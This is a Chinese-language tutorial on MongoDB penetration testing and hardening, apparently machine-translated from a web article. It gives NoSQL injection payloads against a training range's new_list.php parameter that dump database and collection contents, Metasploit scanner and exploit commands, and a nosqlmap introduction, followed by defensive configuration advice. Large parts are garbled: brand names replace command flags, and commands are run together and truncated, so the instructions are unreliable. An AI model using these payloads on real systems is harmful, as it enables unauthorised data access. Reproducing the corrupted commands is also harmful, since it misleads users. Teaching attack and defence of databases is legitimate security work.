本文主要介紹滲透測試培訓(xùn)(滲透測試工具),下面一起看看滲透測試培訓(xùn)(滲透測試工具)相關(guān)資訊。
基本知識端口號:27017
初始數(shù)據(jù)庫
管理員:從權(quán)限的角度來看,這是 根與樹數(shù)據(jù)庫。如果將用戶添加到此數(shù)據(jù)庫,該用戶將自動繼承所有數(shù)據(jù)庫的權(quán)限。一些特定的服務(wù)器端命令只能從該數(shù)據(jù)庫運行,例如列出所有數(shù)據(jù)庫或關(guān)閉服務(wù)器。
local:這些數(shù)據(jù)永遠(yuǎn)不會被復(fù)制,并且可以用來存儲僅限于單個本地服務(wù)器的任何集合。
config:使用mongo進(jìn)行分片設(shè)置時,內(nèi)部使用config數(shù)據(jù)庫保存分片的相關(guān)信息。
安裝mongodb
窗子
#下載安裝包,二是圖形界面管理工具-windows-x86 _ 64-4 . 4 . 13 . zip mongodb-compass-1 . 31 . 2-win32-x64 . zip #選項:custom =不勾選安裝mongodb compass =安裝后重啟#配置環(huán)境變量:c: \ program files \ mongodb \ server \ 4.4 \ bin #編譯配置文件,以配置文件的形式方便mongodb服務(wù)的后續(xù)啟動,創(chuàng)建文件cecho 12-.然后保存#系統(tǒng)日志相關(guān)syst: d:文件#文件存儲日志path: c: \ mongodb \ log \ mongodb . log #日志位置,創(chuàng)建\日志目錄logapp: tru: journal: #回滾日志: true dbpath: ceco 12-@ . com \ mongodb \data\ db #數(shù)據(jù)存儲目錄,并創(chuàng)建\ data \db目錄#網(wǎng)絡(luò)配置相關(guān)n: port: 27017 #默認(rèn)端口bindip: 0 . 0 . 0 . 0 #綁定ip,多個ip用逗號分隔#將mongodb服務(wù)添加到windows服務(wù)中,以管理員身份打開終端mongod-config c: \ mongodb \ mongodb . conf-install #并在終端打開mongodb服務(wù)net start mongodbkali,
#添加軟件包apt-get安裝gnupg wget-qo- www . mongodb . org/static/pgp/server-4.4 . asc | apt-key add-echo d-org/4.4 main | tee/etc/apt/sources . list . d/mongodb-org-4.4 . list apt-get update #最新版本安裝apt-get install -y mongodb-org#定制版本安裝,并鎖定版本apt-get install-y mongodb-org = 4 . 4 . 13 mongodb-org-server = 4 . 4 . 13 mongodb-org-shell = 4 . 4 . 13 mongodb-org-mongos = 4 . 4 . 13 mongodb-org-tools = 4 .ongodb-org hold dpkg-set-selection echo mongodb-org-server hold dpkg-set-selection echo 殼牌控股有限公司dpkg-集-選擇回聲 mongodb-org-mongohold dpkg-集-選擇回聲 mongodb-org-工具庫| dpkg-設(shè)置-選擇#啟動mongobsystemctl守護(hù)進(jìn)程-重新加載systemctlst。artmongosystemctl狀態(tài)mongosystemctl enable mongogod #查看日志cat/var/log/mongodb/mongogod . log #配置遠(yuǎn)程連接,第24行修改bindip為0.0.0.0 vim/etc/mongogod.conf #重啟服務(wù)systemctl重啟mongod #打開交互shellmongo創(chuàng)建用戶。
#配置服務(wù)并建立到mongousadmin的遠(yuǎn)程連接#創(chuàng)建新用戶db . create user({ user : toki ,pw: 123456,roles cho 12-@ . com[{ 角色與責(zé)任: 用戶管理 , db : 行政及管理}、{ 角色與責(zé)任: 根與樹, db : 行政及管理}、{ 角色與責(zé)任: useradminydatabase , db : 行政及管理} })# authoriz:27017/admin#賬號管理命令#修改用戶權(quán)限db . update user( 托奇 ,{ role cho 12-@ .com[{ role cho 12-@ .com readwriteanydatabase ,db: 行政及管理}]) #修改用戶密碼db . change user password( toki , 123456)#刪除用戶db . drop user( ;托奇
mongodb可以有多個數(shù)據(jù)庫,每個數(shù)據(jù)庫包含一個或多個集合,每個集合包含一個或多個文檔。
#創(chuàng)建數(shù)據(jù)庫使用庫名#查看當(dāng)前數(shù)據(jù)庫db#將數(shù)據(jù)插入集合db . data . insert({ 用戶 : toki })db . data . insert({ toki : 123 }) db.data。。插入({ toki : 456 }) #查看數(shù)據(jù)庫列表顯示dbs#查詢數(shù)據(jù)db.data.find#寫入條件db . data . find({ 用戶 : toki })# delete data db . data . remove({ toki : 456 }) db.data.find #刪除集合顯示集合db.data.drop顯示集合#刪除數(shù)據(jù)庫db.dropdatabase顯示dbs在線射擊場sql手動注入漏洞測試。
#構(gòu)造連接測試 echo/new _ list . php?id = 1 });return ({title :1,content : ;2 #爆炸庫/new_list.php?id = 1 });return({ title : tojson(db),content : ;1 # off the charts #查詢所有集合(集合相當(dāng)于mysql表)/new_list.php?id = 1 });return({ title : tojson(db . getcollectionnames)),content : ;1 # find函數(shù)用于查詢,0是第一個數(shù)據(jù)/new_list.php?id = 1 });return({ title : tojson(db。authority _ confidential . find[0])、content t: ;1 # md5破解:,當(dāng)配置為無認(rèn)證時,存在未授權(quán)訪問。msf中的scann測試,navicat連接用于獲取數(shù)據(jù)庫中的內(nèi)容。
#未授權(quán)驗證和掃描use auxiliary/scanner/mongodb/mongodb _ loginset hosts目標(biāo)。machine ip/24 set threads 10 exploit # exp using use exploit/linux/misc/mongol _ native _ helper set password password set username account name set rhosts目標(biāo)機器ipexploit自動評估nosqlmap簡介:
nosqlmap是一個開源的python工具,用于審計和自動化注入攻擊,并利用nosql數(shù)據(jù)庫和使用nosql的web應(yīng)用程序中的默認(rèn)配置弱點來泄露數(shù)據(jù)庫中的數(shù)據(jù)。目前,該工具的漏洞主要集中在mongodb上,但計劃在未來版本中為基于nosql的其他平臺(如couchdb、redis和cassandra)提供額外支持。
特點:
mongodb和couchdb的自動化數(shù)據(jù)庫枚舉和克隆攻擊。通過mongodb web應(yīng)用程序提取數(shù)據(jù)庫名稱、用戶和密碼哈希。用默認(rèn)的訪問和枚舉版本掃描mongodb和couchdb數(shù)據(jù)庫的子網(wǎng)或ip列表。用一個強大的字典把mongodb和couchdb的hash炸開。針對mongoclient的php應(yīng)用參數(shù)注入攻擊返回所有數(shù)據(jù)庫記錄。javascript函數(shù)變量轉(zhuǎn)義和任意代碼注入返回所有數(shù)據(jù)庫記錄?;谟嫊r的攻擊類似于sql盲注驗證javascript注入漏洞,沒有回顯信息。下載:
git clon no sql map #方法1 python2 setup.py install#方法2 cd docker docker build-t nosqlmap。#方法3 docker-compose build docker-compose run no sqlmap整改加固建議只在本地使用本地監(jiān)控,如mongodb,建議只在本地啟動監(jiān)控服務(wù),監(jiān)控地址用- bind_ip 127.0.0.1綁定。
mongod-bind _ ip 127 . 0 . 0 . 1-dbpath/tmp/test或者在配置文件中指定ip,linux下默認(rèn)的配置文件是/etc/mongod.conf。
#網(wǎng)絡(luò)interfac:端口: 27017 bindip: 127 . 0 . 0 . 1指定配置文件啟動。
mongogod-config/etc/mongogod . conf 3.0及以后版本的mongodb,服務(wù)默認(rèn)只對127.0.0.1開放。
限制訪問源如果只有內(nèi)網(wǎng)服務(wù)器提供服務(wù),建議不要在互聯(lián)網(wǎng)上發(fā)布mongodb服務(wù),通過防火墻在主機上限制對源ip的訪問。
linux使用iptables進(jìn)行限制。
#允許外部應(yīng)用訪問mongodb默認(rèn)服務(wù)端口27017iptables -a input -s您需要訪問mongodb服務(wù)的ip-ptcp-destination-port 27017-m state-state new。established -j accept#允許mongodb出站流量到達(dá)外部應(yīng)用程序iptables-a output-d ip-p tcp-source-port 27017-m state-state established-j accept windows可以通過圖形管理界面添加防火墻,策略或使用netsh命令添加,參考文檔: docs . mongodb . com/manual/tutorial/configure-windows-netsh-firewall/
啟動基于角色的登錄認(rèn)證功能mongodb支持scram、x.509證書認(rèn)證等多種認(rèn)證機制。scram (salted challenge response認(rèn)證機制)是版本3的默認(rèn)認(rèn)證機制。十、該機制通過用戶名和密碼進(jìn)行驗證,訪問控制基于用戶角色。
mongodb 3.0及以上版本啟動時,添加- auth參數(shù)啟動認(rèn)證訪問。此時,如果數(shù)據(jù)庫中沒有帳戶,本地登錄無權(quán)執(zhí)行任何操作。因此,有必要在不進(jìn)行身份驗證的情況下啟動服務(wù),并創(chuàng)建系統(tǒng)用戶管理員帳戶。
#啟動mongodb mongogod無訪問認(rèn)證-dbpath/data/db #在無認(rèn)證的環(huán)境下,登錄數(shù)據(jù)庫mongo-host127.0.0.1-port27017 #切換到admin庫使用admin#創(chuàng)建系統(tǒng)。用戶管理員帳戶(在3.0之前的版本中,用戶是由db.adduser方法創(chuàng)建的)db . cr: 用戶名 、pwd: 密碼和密碼rol:·[{rol: us: 行政及管理}]}) #重啟mongodb服務(wù),啟動訪問認(rèn)證時添加-auth參數(shù)mongod-auth-port 27017-dbpath/tmp/test #或者在配置文件中添加以下內(nèi)容。指定配置文件啟動服務(wù)security: authorization:啟用#指定配置文件啟動mongodb mongod-config/etc/mongo . conf #登錄到mongo-port 27017-u 用戶名和密碼-寶潔公司密碼和密碼-認(rèn)證數(shù)據(jù)庫和行政及管理#使用系統(tǒng)用戶管理員帳戶,或者您可以連接到mongodb而不指定身份驗證信息。連接成功后,使用db.auth方法進(jìn)行身份驗證。使用admindb . auth( 用戶名 , 密碼和密碼)#要創(chuàng)建數(shù)據(jù)庫用戶,需要創(chuàng)建系統(tǒng)用戶管理員帳戶并通過系統(tǒng)用戶管理員登錄,然后為每個數(shù)據(jù)庫創(chuàng)建指定用戶。#讓 創(chuàng)建一個對產(chǎn)品庫具有讀寫權(quán)限的用戶,使用productsdb。創(chuàng)建用戶({us:用戶名 、pwd: 密碼和密碼,rol:[ 讀寫 , dbadmin ] })#使用數(shù)據(jù)庫用戶訪問指定的庫mongo-port 27017-u 用戶名和密碼-寶潔公司密碼和密碼-認(rèn)證數(shù)據(jù)庫 產(chǎn)品和服務(wù)標(biāo)簽:
數(shù)據(jù)庫用戶
了解更多滲透測試培訓(xùn)(滲透測試工具)相關(guān)內(nèi)容請關(guān)注本站點。